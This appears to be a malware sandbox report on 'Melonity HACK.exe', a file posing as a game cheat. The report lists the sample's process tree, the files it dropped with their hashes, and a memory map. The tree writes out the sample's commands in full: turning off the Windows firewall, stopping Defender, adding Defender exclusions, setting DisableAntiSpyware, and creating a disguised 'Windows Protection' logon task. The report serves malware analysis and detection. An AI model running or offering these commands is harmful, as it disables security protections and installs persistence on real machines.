C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\t.bat" "4⤵
-
C:\Windows\SysWOW64\netsh.exeNetSh Advfirewall set allprofiles state off5⤵
-
C:\Windows\SysWOW64\net.exenet stop windefend5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop windefend6⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Defender" /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Task Host" /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f5⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC ONLOGON /TN "Windows Protection" /TR "C:\ProgramData\Defender\Start.exe" /f5⤵
- Creates scheduled task(s)
-
C:\ProgramData\Defender\ac1.exeC:\ProgramData\Defender\ac1.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA2⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\ProgramData\Defender\u.exe"C:\ProgramData\Defender\u.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\ProgramData\Defender\u.exe"C:\ProgramData\Defender\u.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\d.vbs"2⤵
-
C:\ProgramData\Defender\d.exe"C:\ProgramData\Defender\d.exe" 61 C:\ProgramData\Defender\d1.exe3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\t.bat" "3⤵
-
C:\Windows\SysWOW64\netsh.exeNetSh Advfirewall set allprofiles state off4⤵
-
C:\Windows\SysWOW64\net.exenet stop windefend4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop windefend5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Defender" /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Task Host" /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC ONLOGON /TN "Windows Protection" /TR "C:\ProgramData\Defender\Start.exe" /f4⤵
- Creates scheduled task(s)
-
C:\ProgramData\Defender\ac.exeC:\ProgramData\Defender\ac.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA2⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Desktop\Melonity HACK.exe"C:\Users\Admin\Desktop\Melonity HACK.exe"1⤵
- Modifies registry class
-
C:\ProgramData\Defender\ab.exeC:\ProgramData\Defender\ab.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA2⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\dd.vbs"3⤵
- Checks computer location settings
-
C:\ProgramData\Defender\d.exe"C:\ProgramData\Defender\d.exe" 61 C:\ProgramData\Defender\dd.bat4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\t.bat" "4⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\SysWOW64\netsh.exeNetSh Advfirewall set allprofiles state off5⤵
-
C:\Windows\SysWOW64\net.exenet stop windefend5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop windefend6⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Defender" /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Task Host" /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC ONLOGON /TN "Windows Protection" /TR "C:\ProgramData\Defender\Start.exe" /f5⤵
- Creates scheduled task(s)
-
C:\ProgramData\Defender\ac1.exeC:\ProgramData\Defender\ac1.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA2⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\ProgramData\Defender\u.exe"C:\ProgramData\Defender\u.exe"3⤵
-
C:\ProgramData\Defender\u.exe"C:\ProgramData\Defender\u.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\d.vbs"2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in System32 directory
-
C:\ProgramData\Defender\d.exe"C:\ProgramData\Defender\d.exe" 61 C:\ProgramData\Defender\d1.exe3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\t.bat" "3⤵
-
C:\Windows\SysWOW64\netsh.exeNetSh Advfirewall set allprofiles state off4⤵
-
C:\Windows\SysWOW64\net.exenet stop windefend4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop windefend5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Defender" /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Task Host" /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC ONLOGON /TN "Windows Protection" /TR "C:\ProgramData\Defender\Start.exe" /f4⤵
- Creates scheduled task(s)
-
C:\ProgramData\Defender\ac.exeC:\ProgramData\Defender\ac.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA2⤵
-
C:\ProgramData\Defender\min.exe"C:\ProgramData\Defender\min.exe"3⤵
-
C:\ProgramData\Defender\Start.exeC:\ProgramData\Defender\Start.exe4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C757.tmp\C758.tmp\C759.bat C:\ProgramData\Defender\Start.exe"5⤵
-
C:\Windows\system32\timeout.exeTIMEOUT /t 106⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\s.vbs"6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\s.bat" "7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -executionpolicy Unrestricted C:\ProgramData\Defender\timeout.ps18⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x0xrdeww\x0xrdeww.cmdline"9⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF117.tmp" "c:\Users\Admin\AppData\Local\Temp\x0xrdeww\CSCD41496A7B9DC475C87FF9C48CB44F9B.TMP"10⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\k.vbs"9⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\k.bat" "10⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Protection.exe"11⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Process.exe"11⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\k.vbs"9⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\k.bat" "10⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Protection.exe"11⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Process.exe"11⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\k.vbs"9⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\k.bat" "10⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Protection.exe"11⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Process.exe"11⤵
- Kills process with taskkill
-
C:\ProgramData\Task Host\svchost.exe"C:\ProgramData\Task Host\svchost.exe"7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EE86.tmp\EE87.tmp\EE88.bat "C:\ProgramData\Task Host\svchost.exe""8⤵
-
C:\ProgramData\Task Host\svchost.exe"C:\ProgramData\Task Host\svchost.exe"6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EE09.tmp\EE0A.tmp\EE0B.bat "C:\ProgramData\Task Host\svchost.exe""7⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C544.tmp\C545.tmp\C546.bat "C:\ProgramData\Task Host\svchost.exe""1⤵
-
C:\Users\Admin\Desktop\Melonity HACK.exe"C:\Users\Admin\Desktop\Melonity HACK.exe"1⤵
-
C:\ProgramData\Defender\ab.exeC:\ProgramData\Defender\ab.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA2⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\dd.vbs"3⤵
-
C:\ProgramData\Defender\d.exe"C:\ProgramData\Defender\d.exe" 61 C:\ProgramData\Defender\dd.bat4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\t.bat" "4⤵
-
C:\Windows\SysWOW64\netsh.exeNetSh Advfirewall set allprofiles state off5⤵
-
C:\Windows\SysWOW64\net.exenet stop windefend5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop windefend6⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Defender" /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Task Host" /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC ONLOGON /TN "Windows Protection" /TR "C:\ProgramData\Defender\Start.exe" /f5⤵
- Creates scheduled task(s)
-
C:\ProgramData\Defender\ac1.exeC:\ProgramData\Defender\ac1.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA2⤵
-
C:\ProgramData\Defender\u.exe"C:\ProgramData\Defender\u.exe"3⤵
-
C:\ProgramData\Defender\u.exe"C:\ProgramData\Defender\u.exe"2⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\d.vbs"2⤵
-
C:\ProgramData\Defender\ac.exeC:\ProgramData\Defender\ac.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA2⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Defender\ab.exeFilesize
766KB
MD5fc846968d7791ad9d6392bdd6dec80fa
SHA1bee026f7dcea0d2643807de0930c8542f4dc93c5
SHA256952b6e0b3b60b25837476568f202546d9c76aef7db5756f4e358f291fe43b14b
SHA512c7133319aa32276d86fc08262dc63f5b97ff55cc1a2fe8d29654ec6178a1bd7068f53c7527edd6148d71c3a50bec9a1a897119f665454bd89fd4c86cf55c7dd6
-
C:\ProgramData\Defender\ab.exeFilesize
766KB
MD5fc846968d7791ad9d6392bdd6dec80fa
SHA1bee026f7dcea0d2643807de0930c8542f4dc93c5
SHA256952b6e0b3b60b25837476568f202546d9c76aef7db5756f4e358f291fe43b14b
SHA512c7133319aa32276d86fc08262dc63f5b97ff55cc1a2fe8d29654ec6178a1bd7068f53c7527edd6148d71c3a50bec9a1a897119f665454bd89fd4c86cf55c7dd6
-
C:\ProgramData\Defender\ac.exeFilesize
14.7MB
MD568576adb3317d4277c8b910754db9dd6
SHA109dc1d7bf0c4f2e1eaaeffc2207435c8f02f75d6
SHA256be2d385b186b860114e69d949a399ac1de1d99bc93f5dde9f3828f71034b386e
SHA512a5f7be69aeda4d80024ff1bd17688dc0f20aef3ef53e240fd994effb407656a95dbd0ffb2b0d772d73fb13b9652a77eb30d130b252f6ad0f25d6f6fe4b4931c2
-
C:\ProgramData\Defender\ac1.exeFilesize
476KB
MD54636b36b24a7b8b94faa114597199c9e
SHA1103de7fd72fdcc57e57fd343cc4fcf71acdb9826
SHA256d3466d1faf5a824a558f9118d022af78f729f8c83b00630a7c199c58545e0aa5
SHA5122024be83921488dcab0cdee2cd6aeb7dc5c2e894ede1bdc6c5ea6b8c685c952a4b8b9991721d3f98c4d8e7b9431e551046bac9201f6349efc3a3a87e50e4fe01
-
C:\ProgramData\Defender\ac1.exeFilesize
476KB
MD54636b36b24a7b8b94faa114597199c9e
SHA1103de7fd72fdcc57e57fd343cc4fcf71acdb9826
SHA256d3466d1faf5a824a558f9118d022af78f729f8c83b00630a7c199c58545e0aa5
SHA5122024be83921488dcab0cdee2cd6aeb7dc5c2e894ede1bdc6c5ea6b8c685c952a4b8b9991721d3f98c4d8e7b9431e551046bac9201f6349efc3a3a87e50e4fe01
-
C:\ProgramData\Defender\d.exeFilesize
127KB
MD5ad406b55025faeb28a87788f8c00539b
SHA17ba1ac8867e1674217dd581894a3943a7c982c7c
SHA256c3ba2d27c31e46fa30805cdc5a19ef3c3638e8b2076997730dc3f5eb7cc28981
SHA5124670fa77b9493192fd37f19248742aeb3860364780954f4590ef2fa7d3914470d13e9fefe3acf767f11abc283e312a838e1fb4bc6d2c893ea4e663f434a237bf
-
C:\ProgramData\Defender\d.exeFilesize
127KB
MD5ad406b55025faeb28a87788f8c00539b
SHA17ba1ac8867e1674217dd581894a3943a7c982c7c
SHA256c3ba2d27c31e46fa30805cdc5a19ef3c3638e8b2076997730dc3f5eb7cc28981
SHA5124670fa77b9493192fd37f19248742aeb3860364780954f4590ef2fa7d3914470d13e9fefe3acf767f11abc283e312a838e1fb4bc6d2c893ea4e663f434a237bf
-
C:\ProgramData\Defender\d.vbsFilesize
288B
MD5f412cd3e21869e9bed5b84a391c3e923
SHA1c9a9f3461de32ce457993cb862a3a6433baf5501
SHA256b9938c9ae8d9ef0c5187598882ec330aca856ae9202ba40affc766aad28ba348
SHA5123016e75e5d01d53293ac25a02bbec928049d241452448f3b91810eeda4c84acc36ed28dce6094752a8edec0b438369dbeaa3c0aa8538690af4e7ac318fea34ce
-
C:\ProgramData\Defender\dd.vbsFilesize
288B
MD57f6aeff67cf0ff0525016e06273317c5
SHA1faed754543e1c18926bea3e076c08a6faf650dcc
SHA2567ba00db5d700ccb9208db43b3f373e054d61594873d05430404f620d4d0deea1
SHA512fc78f91ca1774aae9cb798aefb53b57464c3ac3c8cf05d966b71a077bf4b065822a46270ea1289d25f7ac7190f89e537759996f6ee4caa4179a5309b43ed8a40
-
C:\ProgramData\Defender\t.batFilesize
732B
MD58c526aef3d9ff3365c92877aa3069758
SHA1559c2987c0209be0fe16315c553a6505323fc8db
SHA256d2873016df2a468a0d506ebc7bde3c413dd9ae5ece08073ede7e9e263bd59d9b
SHA512ea16fa435a24fea5ca1f1c4abf6c05556b877e44668d6a587ed8c3d6a2d79d4dcd85d238a297f1ff0f2e362e6a5995217ede0f6dbcc15c5a12176f9bdba0bd5c
-
C:\ProgramData\Defender\u.exeFilesize
14KB
MD573bdcc03365a915741a98a9bf7a0d05a
SHA10839bdf18a803dfaacc20be0532094d191291924
SHA2569108afeecaa421ae471f120f56597298e2a5b710cbdf74ebd93829c158ce505f
SHA512e8216eabd324e6622685776249a674bece371178f5ddf895431c0079f5ee55b6cfda9ec8cb80ae7da3771f75701156eb28f304e25f8af40fe677bb1920ea8c86
-
C:\ProgramData\Defender\u.exeFilesize
14KB
MD573bdcc03365a915741a98a9bf7a0d05a
SHA10839bdf18a803dfaacc20be0532094d191291924
SHA2569108afeecaa421ae471f120f56597298e2a5b710cbdf74ebd93829c158ce505f
SHA512e8216eabd324e6622685776249a674bece371178f5ddf895431c0079f5ee55b6cfda9ec8cb80ae7da3771f75701156eb28f304e25f8af40fe677bb1920ea8c86
-
C:\ProgramData\Defender\u.exeFilesize
14KB
MD573bdcc03365a915741a98a9bf7a0d05a
SHA10839bdf18a803dfaacc20be0532094d191291924
SHA2569108afeecaa421ae471f120f56597298e2a5b710cbdf74ebd93829c158ce505f
SHA512e8216eabd324e6622685776249a674bece371178f5ddf895431c0079f5ee55b6cfda9ec8cb80ae7da3771f75701156eb28f304e25f8af40fe677bb1920ea8c86
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\u.exe.logFilesize
42B
MD584cfdb4b995b1dbf543b26b86c863adc
SHA1d2f47764908bf30036cf8248b9ff5541e2711fa2
SHA256d8988d672d6915b46946b28c06ad8066c50041f6152a91d37ffa5cf129cc146b
SHA512485f0ed45e13f00a93762cbf15b4b8f996553baa021152fae5aba051e3736bcd3ca8f4328f0e6d9e3e1f910c96c4a9ae055331123ee08e3c2ce3a99ac2e177ce
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\CachesMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
C:\Users\Admin\Downloads\Melonity HACK.exeFilesize
16.8MB
MD501e11b4bf36299650fb033a346b46e76
SHA103f22ac75a70a9687552618ad47b3b86cf26a693
SHA2566ec174d704d09f7d01bd98adc489cf8447d553810f4e7c0d84a13547d6ce16b2
SHA5121971dd33ec5e5d84401a0b00290244ba075a60c8516745c13600794eba5b2b9af3fcdc431a9f42b9c2289871e26ea5cb64fe459acc92dc164073f35163371371
-
C:\Users\Admin\Downloads\Melonity HACK.exeFilesize
16.8MB
MD501e11b4bf36299650fb033a346b46e76
SHA103f22ac75a70a9687552618ad47b3b86cf26a693
SHA2566ec174d704d09f7d01bd98adc489cf8447d553810f4e7c0d84a13547d6ce16b2
SHA5121971dd33ec5e5d84401a0b00290244ba075a60c8516745c13600794eba5b2b9af3fcdc431a9f42b9c2289871e26ea5cb64fe459acc92dc164073f35163371371
-
C:\Windows\SysWOW64\GroupPolicy\gpt.iniFilesize
11B
MD5ec3584f3db838942ec3669db02dc908e
SHA18dceb96874d5c6425ebb81bfee587244c89416da
SHA25677c7c10b4c860d5ddf4e057e713383e61e9f21bcf0ec4cfbbc16193f2e28f340
SHA51235253883bb627a49918e7415a6ba6b765c86b516504d03a1f4fd05f80902f352a7a40e2a67a6d1b99a14b9b79dab82f3ac7a67c512ccf6701256c13d0096855e
-
C:\Windows\System32\GroupPolicy\GPT.INIFilesize
235B
MD554784465609d5525bca207b3944147aa
SHA12218c0745866141a7c820a71ca342779f7e77162
SHA256cded0ecd37bbdbc0ecfd9501f87e9875e9cea87dfa8568c7a973bd500f4a478c
SHA5129affd32ef9f35a5006d9638ec0c221d8c356620702c266aea08118c3e792a121a0443fc3a48fa583f53b63a65f177536d17918a0415964e26010a1f87a07ef3c
-
C:\Windows\System32\GroupPolicy\Machine\Registry.polFilesize
3KB
MD5ca371b43e4ff6dc472a8037c2a5bc69f
SHA15a0ff91820baa64c0dd3aea5bb99d1523973ecec
SHA2567c3fad50fa7fecfab30d70d50df17a90a5e6b887bae5edc482659daef30efb02
SHA512874257d1fce9260b8400f15b38c073e37ce3594fe502573a42e2e236ce8a57d5a9b52e35108ee324c28a734e5b57737cf13272e1e09126b540ad1c89eadf88ec
-
C:\Windows\System32\GroupPolicy\User\Registry.polFilesize
520B
MD50e7c336637fa0448940665f0aa026c96
SHA1bfc72d8957667c7ebc1535848d2a9c0240d98af9
SHA256aace755c854c2d470bcffc53139930eaaf68d2add28bc4b48befa981d2d74ed1
SHA5129884b4b8b54e2b2bb829ee44b88367425a444c6d48d6e12ee22cc888c9fdbff41f92107e8429ade0a257a290609453ff9bd636922a559b9f37c377d438fd7b45
-
\??\pipe\crashpad_2348_PYDJCZQXFFTBTDSKMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/116-192-0x0000000000000000-mapping.dmp
-
memory/212-164-0x0000000000000000-mapping.dmp
-
memory/216-170-0x0000000000000000-mapping.dmp
-
memory/224-205-0x0000000000000000-mapping.dmp
-
memory/940-207-0x0000000000000000-mapping.dmp
-
memory/1120-221-0x0000000140000000-0x0000000141B39000-memory.dmpFilesize
27.2MB
-
memory/1172-179-0x0000000000000000-mapping.dmp
-
memory/1292-218-0x00007FFA00C90000-0x00007FFA01751000-memory.dmpFilesize
10.8MB
-
memory/1292-217-0x000001A639320000-0x000001A639342000-memory.dmpFilesize
136KB
-
memory/1304-195-0x0000000000000000-mapping.dmp
-
memory/1336-175-0x0000000000000000-mapping.dmp
-
memory/1460-177-0x0000000000000000-mapping.dmp
-
memory/1460-201-0x0000000000000000-mapping.dmp
-
memory/1488-211-0x0000000000000000-mapping.dmp
-
memory/1488-202-0x0000000000000000-mapping.dmp
-
memory/1812-209-0x0000000000000000-mapping.dmp
-
memory/1812-187-0x0000000000000000-mapping.dmp
-
memory/1884-213-0x0000000000000000-mapping.dmp
-
memory/1916-225-0x00007FFA00C90000-0x00007FFA01751000-memory.dmpFilesize
10.8MB
-
memory/1916-165-0x0000000000000000-mapping.dmp
-
memory/1916-216-0x0000000000000000-mapping.dmp
-
memory/1932-181-0x0000000000000000-mapping.dmp
-
memory/1932-168-0x0000000000000000-mapping.dmp
-
memory/2056-185-0x0000000000000000-mapping.dmp
-
memory/2076-190-0x0000000000000000-mapping.dmp
-
memory/2128-174-0x0000000000000000-mapping.dmp
-
memory/2236-212-0x0000000000000000-mapping.dmp
-
memory/2236-196-0x0000000000000000-mapping.dmp
-
memory/2268-219-0x000002249ACF0000-0x000002249AD10000-memory.dmpFilesize
128KB
-
memory/2268-220-0x000002249AD40000-0x000002249AD44000-memory.dmpFilesize
16KB
-
memory/2844-162-0x0000000000000000-mapping.dmp
-
memory/2944-171-0x0000000000000000-mapping.dmp
-
memory/3060-194-0x0000000000000000-mapping.dmp
-
memory/3148-138-0x0000000000000000-mapping.dmp
-
memory/3220-167-0x0000000000000000-mapping.dmp
-
memory/3360-161-0x0000000000000000-mapping.dmp
-
memory/3468-200-0x0000000000000000-mapping.dmp
-
memory/3468-160-0x0000000000000000-mapping.dmp
-
memory/3480-204-0x0000000000000000-mapping.dmp
-
memory/3600-173-0x0000000000000000-mapping.dmp
-
memory/3612-189-0x0000000000000000-mapping.dmp
-
memory/3688-214-0x0000000000000000-mapping.dmp
-
memory/3732-140-0x0000000000000000-mapping.dmp
-
memory/3752-169-0x0000000000000000-mapping.dmp
-
memory/3792-203-0x0000000000000000-mapping.dmp
-
memory/3832-199-0x0000000000000000-mapping.dmp
-
memory/3932-132-0x0000000000000000-mapping.dmp
-
memory/4016-176-0x0000000000000000-mapping.dmp
-
memory/4040-215-0x0000000000000000-mapping.dmp
-
memory/4116-166-0x0000000000000000-mapping.dmp
-
memory/4136-143-0x0000000000000000-mapping.dmp
-
memory/4136-146-0x00000000007A0000-0x00000000007AA000-memory.dmpFilesize
40KB
-
memory/4232-206-0x0000000000000000-mapping.dmp
-
memory/4244-135-0x0000000000000000-mapping.dmp
-
memory/4252-197-0x0000000000000000-mapping.dmp
-
memory/4284-208-0x0000000000000000-mapping.dmp
-
memory/4320-198-0x0000000000000000-mapping.dmp
-
memory/4324-188-0x0000000000000000-mapping.dmp
-
